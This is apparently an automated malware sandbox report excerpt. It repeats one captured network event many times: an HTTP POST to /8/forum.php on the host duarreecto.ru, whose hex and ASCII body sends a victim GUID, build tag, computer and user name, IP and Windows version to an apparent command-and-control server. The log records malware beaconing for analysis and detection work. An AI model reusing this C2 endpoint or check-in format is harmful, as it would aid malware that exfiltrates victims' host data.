Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
